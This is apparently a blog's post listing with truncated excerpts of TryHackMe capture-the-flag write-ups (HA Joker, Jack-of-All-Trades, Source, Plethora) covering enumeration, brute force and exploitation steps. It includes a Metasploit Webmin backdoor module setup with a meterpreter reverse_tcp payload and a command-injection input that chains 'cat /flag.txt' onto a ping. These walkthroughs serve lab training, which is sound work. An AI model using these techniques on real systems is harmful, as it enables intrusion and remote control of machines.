Posts

HA Joker CTF TryHackMe | HA Joker CTF This room is rated medium. First of all, as usual, we will run an Nmap scan against our target. As we can see, there are three ports open: SSH and two HTTP services. So let's take a look at the web app that is running on port 80. We have a web page with a lot of the Joker's quotes. Let's take a look at the page source to see if there is any interesting info we can find. Hmm, there is no useful info, so let's visit the second service on port 8080. It requires a username and password to access this page. OK, let's run gobuster against port 80 and see what we find. Great, we found some directories and also some answers. One of the files you will find contains a username; note it. Now that we have a username, it's time to get its password. We will use a brute-force attack to gain access to the service on port 8080, but the hint says that the username and password are encoded with base64, so let's run Burp and take a close look by intercepting th
Recent posts

Jack-of-All-Trades

Jack-of-All-Trades TryHackMe | Jack-of-All-Trades First of all, this write-up is quite long, so be patient and stay tuned, because it's a fun box and you may learn something new. Take your notes and let's jump into this machine, starting with enumeration. We are going to use Nmap to see what ports and services are running. As we can see, there are a web service and SSH, but both of them are running on different ports, so keep that in mind. Let's go to the website and check it out, but first we need to allow HTTP to run on port 22. You need to follow these steps: 1- Select and copy the following preference name: network.security.ports.banned.override 2- In a new tab, type or paste about:config in the address bar and press Enter/Return. Click the button promising to be careful. 3- In the search box above the list, type or paste ports and pause while the list is filtered. If the above-listed preference exists: 4- Double-click it and add a comma to the end of the list followed by the port numb

Source

Source TryHackMe | Source Source was a new room at the time this write-up was written, so let's get started. As we can see, before we do anything, there is a hint in the room description: "Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool". We can see here that a service called Webmin is running, and it says that Webmin is a web-based system configuration tool. Let's run Nmap and see what we get. While Nmap is running, let's take a look at Webmin vulnerabilities. It looks like there is remote code execution in some versions, so let's go back to the Nmap results and see what version we have. As we can see, it's running version 1.890. The good news is that this version is vulnerable to the Webmin password_change.cgi backdoor. This vulnerability has an exploit in Metasploit. You need to use exploit/unix/webapp/webmin_backdoor set payload linux/x64/meterpreter/reverse_tcp set RHOST "machine-IP" set LHOST "your-IP" >> you can ge

Plethora

Plethora TryHackMe | Plethora We will start with enumeration. We are going to use Nmap to see what ports and services are running. As we can see, we have a lot; keep them in a txt file, as we are going to use some of them later. For now, port 80 is open, which means we have a web service up and running. As we can see, we have a web page. Let's take a look at the page source. OK, let's open those machines one by one, starting with DVWA. ------------------------------------ DVWA DVWA is a well-known vulnerable machine with username: admin and password: password. Log in and go to the Command Injection tab. This vulnerability is about running a command on the server side, so we are going to use it to capture our flag. Use: ping bing.com;cat /flag.txt Flag 1 done! ✌ ------------------------------------ XVWA As we did with DVWA, we will do the same here. Navigate to the OS Command Injection tab and run this. Use: ping bing.com;cat /flag.txt Flag 2 done! ✌ ------------------------------------ Mutillidae Mutillidae also